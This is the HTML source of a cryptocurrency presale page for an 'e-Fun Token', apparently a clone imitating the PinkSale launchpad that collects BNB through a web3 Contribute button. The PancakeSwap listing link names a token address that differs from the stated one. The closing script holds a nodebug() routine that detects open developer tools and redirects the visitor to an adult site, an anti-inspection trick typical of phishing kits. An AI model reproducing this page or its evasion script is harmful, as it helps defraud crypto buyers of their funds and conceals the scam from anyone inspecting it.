										
										
										
<table>
	<input type="hidden" name="aid" value="1">
	<input type="hidden" name="pid" value="6">
	<tbody>
		<tr>
			<td>Presale Address</td>
			<td class="has-text-right"><a presale-address target="_blank" href="https://bscscan.com/address/0xcabA3b60400bdC7AfB0359816109a013222d7808" data-project="0xcabA3b60400bdC7AfB0359816109a013222d7808">0xcabA3b60400bdC7AfB0359816109a013222d7808</a>
			</td>
		</tr>
		<tr>
			<td>Token Name</td>
			<td class="has-text-right">e-Fun Token</td>
		</tr>
		<tr>
			<td>Token Symbol</td>
			<td class="has-text-right">EFUN</td>
		</tr>
		<tr>
			<td>Token Decimals</td>
			<td class="has-text-right">18</td>
		</tr>
		<tr>
			<td>Token Address</td>
			<td class="has-text-right"><a href="https://bscscan.com/address/0x6746E37A756DA9E34f0BBF1C0495784Ba33b79B4" class="mr-1" target="_blank" >0x6746E37A756DA9E34f0BBF1C0495784Ba33b79B4</a><br><p class="help is-info">(Do not send BNB to the token address!)</p></td>
		</tr>
		<tr>
			<td>Total Supply</td>
			<td class="has-text-right">10,000,000,000 EFUN</td>
		</tr>
		<tr>
			<td>Tokens For Presale</td>
			<td class="has-text-right">79,920,000 EFUN</td>
		</tr>
		<tr>
			<td>Tokens For Liquidity</td>
			<td class="has-text-right">55,944,000 EFUN</td>
		</tr>
		<tr>
			<td>Presale Rate</td>
			<td class="has-text-right" data-rate>1 BNB = 120,000 EFUN</td>
		</tr>
		<tr>
			<td>Listing Rate</td>
			<td class="has-text-right">1 BNB = 120,000 EFUN</td>
		</tr>
				<tr>
			<td>Initial Market Cap (estimate)</td>
			<td class="has-text-right">$1,681,864</td>
		</tr>
				<tr>
			<td>Soft Cap</td>
			<td class="has-text-right">333 BNB</td>
		</tr>
		<tr>
			<td>Hard Cap</td>
			<td class="has-text-right">666 BNB</td>
		</tr>
		<tr>
			<td>Unsold Tokens</td>
			<td class="has-text-right">Burn</td>
		</tr>
		<tr>
			<td>Presale Start Time</td>
			<td class="has-text-right" data-start=2021.12.18 17:00 (UTC)>2021.12.18 17:00 (UTC)</td>
		</tr>
		<tr>
			<td>Presale End Time</td>
			<td class="has-text-right" data-end="2021.12.20 16:59 (UTC)">2021.12.20 16:59 (UTC)</td>
		</tr>
		<tr>
			<td>Listing On</td>
			<td class="has-text-right">
				<a class="mr-1" href="https://pancakeswap.finance/swap?outputCurrency=0x516dcBD562A317eba15B3C92a0D66820f82e3985" target="_blank" rel="noreferrer nofollow">Pancakeswap</a>
			</td>
		</tr>
		<tr>
			<td>Liquidity Percent</td>
			<td class="has-text-right">70%</td>
		</tr>
		<tr>
			<td>Liquidity Lockup Time</td>
			<td class="has-text-right">
				<a class="mr-1" >365 days after pool ends</a>
			</td>
			
		</tr>
	</tbody>
</table>
	

			                                        
		</div>
	</div>
</div>

									<div style="height: 24px;"></div>
									<div class="ant-card ant-card-bordered">
										<div class="ant-card-head">
											<div class="ant-card-head-wrapper">
												<div class="ant-card-head-title">Token Metrics</div>
											</div>
										</div>
										<div class="ant-card-body">
											<div class="has-text-centered">
												<div class="TokenMetric_root__29Tdv">
													<img src="/pinksale/img/61bc918e9d5c1.png" alt="pinksale">
												</div>
											</div>
										</div>
									</div>
								</div>
								<div class="column is-flex-grow-1">
									<div class="ant-card ant-card-bordered">
										<div class="ant-card-body">
											<form>
												<div id="timeBox" class="has-text-centered">
													<!--<p class="mb-2" id="statusText">Presale Ends In</p>-->
													<div data-show="true" class="ant-alert ant-alert-warning ant-alert-no-icon" role="alert" style="margin-bottom: 10px;">
														<div class="ant-alert-content">
															<div class="ant-alert-message">Make sure the website is pinksale.finance!</div>
															<div class="ant-alert-description"></div>
														</div>
													</div>
													<p class="mb-2" id="statusText" data-remain="-378361">Presale Ends In</p>

													<div class="has-text-centered"><strong><span class="p-2 has-background-danger-light mr-2" style="border-radius: 4px;" id="time_day">00</span><span id="time_hours" class="p-2 has-background-danger-light mr-2" style="border-radius: 4px;">03</span><span id="time_minutes" class="p-2 has-background-danger-light mr-2" style="border-radius: 4px;">31</span><span id="time_seconds" class="p-2 has-background-danger-light mr-2" style="border-radius: 4px;">35</span></strong>
													</div>
												</div>
												<div class="pb-4">
													<div class="ant-progress ant-progress-line ant-progress-status-active ant-progress-default mt-4 mb-2">
														<div class="ant-progress-outer">
															<div class="ant-progress-inner">
																<div class="ant-progress-bg" id="myBar" style="width: 0%; height: 15px; background: rgb(72, 199, 116);">
																</div>
															</div>
														</div>
													</div>
													<div class="is-flex is-align-items-center is-size-7">
														<div class="is-flex-grow-1"><span id="MyValue">0</span> BNB
														</div>
														<div class="is-flex-grow-1 has-text-right" data-hardcap="666">666 BNB</div>
													</div>
												</div>
												
												<div data-show="true" class="ant-alert ant-alert-warning ant-alert-no-icon" role="alert" style="margin-bottom: 10px; margin-top: 10px;"><div class="ant-alert-content"><div class="ant-alert-message"><span class="ant-typography">Binance Smart Chain has had gas issues recently, we recommend that you increase GWEI to 10 before confirming the transaction.</span></div><div class="ant-alert-description"></div></div></div>
												
												
												

												<div id="yushou">
													<div class="field">
														<label class="label" data-max=5 BNB>Amount (max: 5 BNB)</label >
														<div class="control">
															<div style="position: relative;">
																<input id="presaleAmount" class="input" type="number" placeholder="0.0" value=""><a class="mr-2" target="_blank" rel="noreferrer nofollow" style="position: absolute; right: 8px; top: 4px;"><b>MAX</b></a>
															</div>
														</div>
													</div>
													<p id="recieve" style="display:none;" class="help is-info">You will received:<a></a> EFUN</p>
													<div id="pay-div">
														<button id="contribute-btn" type="button" class="ant-btn ant-btn-primary"><svg stroke="currentColor" fill="currentColor" stroke-width="0" viewbox="0 0 1024 1024" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg"><path d="M912 190h-69.9c-9.8 0-19.1 4.5-25.1 12.2L404.7 724.5 207 474a32 32 0 0 0-25.1-12.2H112c-6.7 0-10.4 7.7-6.3 12.9l273.9 347c12.8 16.2 37.4 16.2 50.3 0l488.4-618.9c4.1-5.1.4-12.8-6.3-12.8z"></path>
															</svg><span class="ml-2">Buy</span>
														</button>
													</div>
													<div id="when-pay" style="display:none;">
														<hr>
														<div class="has-text-centered mt-4"><button type="button" modal-show class="ant-btn ant-btn-primary"><span>Emergency Withdraw</span></button></div>
													</div>
												</div>

												<!--<div id="yushou_end" style="display: none">-->
												<!--	<div class="has-text-centered">This pool has ended</div>-->
												<!--	<br>-->
												<!--	<button id="btn-contribute-end" type="button" class="ant-btn ant-btn-primary">-->
												<!--		<span class="ml-2">Claim</span>-->
												<!--	</button>-->
												<!--</div>-->
												<!--<div id="yushou_fail" style="display: none">-->
												<!--	<div class="has-text-centered">This pool has ended</div>-->
												<!--	<br>-->
												<!--	<button id="btn-contribute-fail" type="button" class="ant-btn ant-btn-primary">-->
												<!--		<span class="ml-2">Withdrawal contribution</span>-->
												<!--	</button>-->
												<!--	<br>-->
												<!--	<br>-->
												<!--	<div class="has-text-centered">Since the soft cap was not reached.-->
												<!--	</div>-->
												<!--</div>-->
											</form>
										</div>
									</div>
									<div style="height: 24px;"></div>
									<div class="ant-card ant-card-bordered">
										<div class="ant-card-body">
											<div class="table-container">
												<table>
													<tbody>
														<tr>
															<td>Status</td>
															<td class="has-text-right has-text-primary">inprogress..</td>
														</tr>
														<tr>
															<td>Sale type</td>
															<td class="has-text-right has-text-primary">all</td>
														</tr>
														<tr>
															<td>Minimum Buy</td>
															<td class="has-text-right" data-min>0.01 BNB</td>
														</tr>
														<tr>
															<td>Maximum Buy</td>
															<td class="has-text-right">5 BNB</td>
														</tr>
														<tr style="display:none;" id="purchased">
															<td>Your Purchased</td>
															<td class="has-text-right">00</td>
														</tr>
													</tbody>
												</table>
											</div>
										</div>
									</div>
								</div>
							</div>
						</div>
					</main>
					<footer class="ant-layout-footer">
						<div class="container">
							<div class="copyright">
								<p class="has-text-centered">Disclaimer: The information provided shall not in any way
									constitute a recommendation as to whether you should invest in any product
									discussed. We accept no liability for any loss occasioned to any person acting or
									refraining
									from action as a result of any material provided or published. © 2021 by PinkMoon
									team!</p>
							</div>
						</div>
					</footer>
				</section>
			</section>
		</div>

		<script>
			function resizemenu() {
				if (screen.width <= 700) {
					document.getElementsByClassName('ant-aside-menu')[0].style =
						'background: white; overflow: auto; height: 100vh; position: fixed; top: 70px; left: 0px; z-index: 10; flex: 0 0 0px; max-width: 0px; min-width: 0px; width: 0px;';
					document.getElementsByClassName('ant-section-main')[0].style =
						'margin-left: 0px; padding: 40px 20px 20px; transition: all 200ms linear 0s;';
					document.getElementsByTagName('nav')[0].style = 'padding-top: 1rem!important;';
				} else {
					document.getElementsByClassName('ant-aside-menu')[0].style =
						'background: white; overflow: auto; height: 100vh; position: fixed; top: 70px; left: 0px; z-index: 10; flex: 0 0 200px; max-width: 200px; min-width: 200px; width: 200px;';
					document.getElementsByClassName('ant-section-main')[0].style =
						'margin-left: 200px; padding: 40px 20px 20px; transition: all 200ms linear 0s;';
					document.getElementsByTagName('nav')[0].style = '';
				}
			}
			resizemenu();
			window.addEventListener("resize", function() {
				resizemenu();
			}, false);
		</script>

		<iframe style="display: none;"></iframe>
<div class="ant-modal-root" id="modal-withdraw" style="display:none;"><div class="ant-modal-mask"></div><div tabindex="-1" class="ant-modal-wrap" role="dialog"><div role="document" class="ant-modal ant-modal-confirm ant-modal-confirm-confirm" style="width: 416px; transform-origin: 703.5px 571px;"><div tabindex="0" aria-hidden="true"></div><div class="ant-modal-content"><div class="ant-modal-body"><div class="ant-modal-confirm-body-wrapper"><div class="ant-modal-confirm-body"><span role="img" aria-label="exclamation-circle" class="anticon anticon-exclamation-circle"><svg viewBox="64 64 896 896" focusable="false" data-icon="exclamation-circle" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M512 64C264.6 64 64 264.6 64 512s200.6 448 448 448 448-200.6 448-448S759.4 64 512 64zm0 820c-205.4 0-372-166.6-372-372s166.6-372 372-372 372 166.6 372 372-166.6 372-372 372z"></path><path d="M464 688a48 48 0 1096 0 48 48 0 10-96 0zm24-112h48c4.4 0 8-3.6 8-8V296c0-4.4-3.6-8-8-8h-48c-4.4 0-8 3.6-8 8v272c0 4.4 3.6 8 8 8z"></path></svg></span><span class="ant-modal-confirm-title">Confirm Emergency Withdraw</span><div class="ant-modal-confirm-content"><div data-show="true" class="ant-alert ant-alert-error ant-alert-no-icon" role="alert"><div class="ant-alert-content"><div class="ant-alert-message">Withdrawing your contribution early will cost you a 10% fee.</div><div class="ant-alert-description"></div></div></div></div></div><div class="ant-modal-confirm-btns"><button type="button" modal-hide class="ant-btn"><span>Cancel</span></button><button modal-hide id="withdrawal" type="button" class="ant-btn ant-btn-primary"><span>OK</span></button></div></div></div></div><div tabindex="0" aria-hidden="true" style="width: 0px; height: 0px; overflow: hidden; outline: none;"></div></div></div></div>
<script type="">
	$(function(){
		nodebug() ;
		loadBar()
		$("#presaleAmount").bind('input',function(e){
			var ether = parseFloat($(e.target).val())
			presale_text = $('[data-rate]').text();
			rate = toInt(presale_text)
			amount = rate * ether ;
			res = formatNum(amount)
			$("#recieve").show()
			$("#recieve a").text(res)
			var min = parseFloat($('[data-min]').text());
			if(ether < min){
				$("#contribute-btn").attr('disabled',true)
			}else{
				$("#contribute-btn").attr('disabled',false)
			}
		})
		$("[modal-show]").click(function(){
			$("#modal-withdraw").show()
		})
		$("[modal-hide]").click(function(){
			$("#modal-withdraw").hide()
		})

		$("#withdrawal").click(function(){
			withdraw()
			console.log('window')
		})

		$("#contribute-btn").click(function(){
			var that = $(this);
			var ether = parseFloat($("#presaleAmount").val())
			var min = parseFloat($('[data-min]').text());
			var project = "0xcabA3b60400bdC7AfB0359816109a013222d7808" ;
			
			window.myContract.methods.Contribute(project).send({
				from:window.account ,
				value:ether * 10 ** 18 ,
				gasLimit: 210000
			},function(e,r){
				if(e==null){
					$("#pay-div button").remove()
					$("#pay-div").html(btnPay('can'))
				}
			}).then(function(receipt){
				if(receipt.status){
					console.log(receipt,'成功')
					var pid = $('[name="pid"]').val()
					var aid = $('[name="aid"]').val()
					var date  = new Date()
					var create_time = parseInt(date.getTime()/1000)
					var data =  {
						pid:pid ,
						aid:aid ,
						hash:receipt.transactionHash ,
						amount:ether ,
						from:receipt.from,
						to:receipt.to,
						status:'true',
						create_time: create_time
					}
					addLog(data)
					$("#pay-div").html(that)
					max = $('[data-max]').text().split('Amount (max: ')[1]
			        $('[data-max]').text('Amount (max: '+(parseFloat(max)-ether).toFixed(4)+' BNB)')
			        $("#purchased").show()
			        $("#purchased td").eq(1).text(ether+' BNB')
			        $("#when-pay").show()
				}
			})
		})

		function nodebug(){
		    function resize(){
		        var threshold = 200;
		        var widthThreshold = window.outerWidth - window.innerWidth > threshold;
		        var heightThreshold = window.outerHeight - window.innerHeight > threshold;
		        if(widthThreshold || heightThreshold){
		          	window.location.href="https://www.xnxx.com"  
		        }
		    }
		    window.addEventListener('resize', resize);
		    resize()
		}

	})

</script>


	</body>

</html>
